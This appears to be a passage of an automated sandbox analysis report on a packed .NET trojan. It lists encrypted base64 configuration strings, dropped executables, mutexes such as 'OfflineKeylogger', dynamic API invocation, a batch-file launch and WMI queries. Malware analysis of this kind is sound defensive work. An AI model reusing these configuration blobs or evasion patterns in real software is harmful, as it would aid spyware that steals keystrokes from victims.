Source: Infected.exe.0.dr, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Settings.cs	Base64 encoded string: 'ZSgE7xBGnq+Rt7cUMppN8rA3lH8urzGV2xb7eNCY96Hy1eiWKwwCc7En6gKxqxZ/2PkDlCnX9m2S1lo2xiiB6g==', 'SLrGHEx3OzR+wFRYezLxjUljxsc4JCYeMgZjMnZjnWqe5yx1MwWp01MrYXCUV8+VABeRjwIV74mDU8GclCJ8LA==', 'H5uq8K24WQ59RPaMzoegXPlkFXxNghMbLC8Hyg05hZVlNFM4uLjuYknP/um7OEMV55QkaojJL6HYQYLL/+I1jYGiSFSu3TDJfcKS/wVmsnAQ1vAr7+PHnmtVbTedumXM', '/SSxvI9cCc6gajROWy9NsKWIQlIBncsZdwSCF4aW+gBzj90gnkQo8LljeceOKSHWEmc06qdGCMakK6DB5rySj8cGrJucrDAa2A4EKwFx2j0YlvvtoynHU3WZE84DAdgYtP5hdwTDjZvdgKXmOC6G2gN/pUlG16WpLry/EWADwiWgbDN3d5QnJOhXNjWOx+6nZB/sjkfWoOdEc/j1Cz7ARl1/HWMK97KFiTW67F+7icKK7XHlVC3B0yPoQtoC1b0ulBF9atG/QaNxm4/eSD2N85idPvPZRrIgv+9U0oJ3ADBgJDgI38HRy05GnGrV5NWiTHVtHtng5i7UM0SOze4lCy8Qc8SRRhBTpK/8e47g2uUYOtKbTFeGGUxTQauXcHsWheDZLBk3ivWvHxuQ4JYko3NF1Wc0BVSQpyXmjISoUIkHtsc+svnXS21jmLzGz8UmLMdZrA4kyd50+1XbD5I5Mmy5eFhD2GZ/LCx47keVdZXOA5XdlSGX74PFBKjfV0n1GAKhe/PszCnOCjxC0nVYMVHnAqsE8XT/mjAAwRqJebVPkf/LnFfhvZ2ZGiERCo/U1K1YMteALei0Kmpv2eEgAA+d3/T/6zaxQtEH78x98MHsTBTlrkQRZgj8sqnTl6cEoozQ7IXBomY/876LBkIbgIkJci/FYiTiymGX5qWGUnPBZk18OczUY1jxjHWYSHgbsrEzia6Ww6Ptk0H8pdtD2aQHjFftLMctKhrMauNsX8Kqfcf6KOepoiWfncp5N7oayOXOcxNTAm13mVpR0LUCV2UEantbia5foH79neZA3hLdNk+nqNgn1KXLuxuTVpk1UQN4NWbLRVqzrTiUZj9wN9aXtEDbNqCR7esntSeitBzBgd0L9UXhsk0F61hMHtmA3OXIMqc4n1k/qU4KBPK8YR9a70aXgEV2oeMhOSoYc9yoJTO5Yups9zc8GNLPch7O+doky84atZ05JhnNwpK8YBZoigPbs2tebxyoPuJHePypknfZluW+/6JppQd5lw3nSlXMEviRfto87fflHQFXFtJycWjW+daOJbQHpQ/MNNU=', 'MFMO9tQliu2ahQNaZ3lj7Wf/gRk36qwiOhN2bk2r9goaPIxtvEC1o1xa9OhDCoZCCE/4+3A1er0RXTmjAePWUZiEf716i9ToUYcgyacKNHZnW66p21ybPOob2s2T/B1gnGskdlt5cJpc6jvkp3q/n4JFQRTAesGDRmYu0dyKQ5LPWtBPg/nwm1hQS4zNXK68XGecNV7+oUc6hCHcm2WHB7ixI6S1Rdj8u5c2qquIz9djUVRdGJiEPqnH7aX6ExUEzVhapRSsIue2nifvQ0IfxvlQk9hkzcOQYmbLNZ7EGhs=', 'KSdmB55BOL3ztYhJamMxsl1GB/4EE/vUpYhY8ypiFZ88HhGtjV8JxQYFgyoQ+n8XhN6YFeWOGjHJN5CNponl9g==', 'jVed3LTMOC3Ruh7bMj8e1GRGwkKnPN3oTffGuEc34JGyNAsR2jJEVdUWw0Ib75wbyjKbEVcT+9D1G6Hr50kvyw==', 'pZ/npkec7blOVsRumN94nR0rBZcTDW4ACRirZXscCY48dX8vq9vXv+CBelTsvniWcpE064spGtxGNvGpM7YwHg=='
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Settings.cs	Base64 encoded string: 'wWFEfQ+c90ezzgzVIAh2gn+ioxYAJrGRMTFIxsXSw2YlYKJtM/w/sAkG4PPuKX68Q8Bhjb4R/TNUX88Q9SgO8A==', 'wzI1GS7Qfvo4LsaJi0uqhPvW3er4Q7/n8ss6PONCBS8DzdTXs13MEbSRSJgnXTKJ4iTd++8X/kvaEYndCP/aDA==', 'l6B7hF2xdr1rH7SsDfVoi7MFx7QNmsw3TCZcmQB+isQN4elZF1M0hAmMAEoIFa4cVajo68VCOJDHOBuppuCyyju1WyPfhgBKzN8SLrU61qzZtpILUoxyezPnWbOHqAtV', 'xO7d3fFj6FvLvDIgm7WHEh/cBt3+RxVRoytmJT6p5KptN8hzxoanZtN93I5FqmoFNrney7rUvpRtihOgggLNyA==', 'YWe4qbKlktMVJTOSC4FHgRtIKybnn6IbXRRN5zHOBjqpjbHhP6byE4I7cOaJNeV2YrW/id6gcpYIA2F7eFYRnQ==', 'JvuASB2x4/fyHMUb4XE9373BC5dopAMLZ3bdc7gtg4SCpRBFCmaDPMfE1BHRn+hUN5PQZoiawxNfrQ6MtujUmw==', 'lRQuFjZWrbU8ySWxffDkTrJbvbtMVZ0jLwNEldEi6b5vcEh8/vpwV+vPSoldFWh1hw36BlmUTobTwCBA9G6sfQ==', 'H8k0G7kh/HyAier3JjeeSR0fGh1kIazZBzSNceaI9eCpL2P+V9gNvOj+mLpDbN1eVysH9MSWzLQvfl7VQsXJ1Q==', '/i9VjP44DZ8IjbUQs7c/s8zNlC2hodfvhh2g484pObRIbDikM3SLRxuwt+bMCoxpI4znrsy2cFl9DCBset+TYA==', 'RG/1sRlcEjovL7lahmfV9QwhvWPdPd7GrxPbIa7GYhwuhOm2SAwzCdubNWXRMUHFdIiCHNhnlJRTFVH/IEwCzQ=='

Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Client.exe.0.dr, Methods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Client.exe.0.dr, Methods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Infected.exe.0.dr, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Infected.exe.0.dr, Mesth4ods.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: Infected.exe.0.dr, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: Client.exe.0.dr, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, DInvokeCore.cs	Suspicious method names: .DInvokeCore.DynamicAPIInvoke

Source: whoami.exe, 00000028.00000002.2230637919.000001E068988000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ;.VBP

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@118/59@6/6

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.log

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Loaader.exe	Mutant created: \Sessions\1\BaseNamedObjects\i??Fe?4?z2U?wXC6Af?fUT?6
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7384
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Loader.exe	Mutant created: \Sessions\1\BaseNamedObjects\OfflineKeylogger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\Loader.exe	Mutant created: \Sessions\1\BaseNamedObjects\scgofjarww
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3528:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File created: C:\Users\user\AppData\Local\Temp\Client.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\Infected.exe

Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF85A.tmp.bat""

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\Loaader.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

